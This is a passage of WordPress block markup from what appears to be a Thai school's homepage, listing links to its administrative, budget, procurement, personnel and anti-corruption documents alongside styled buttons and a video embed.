gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 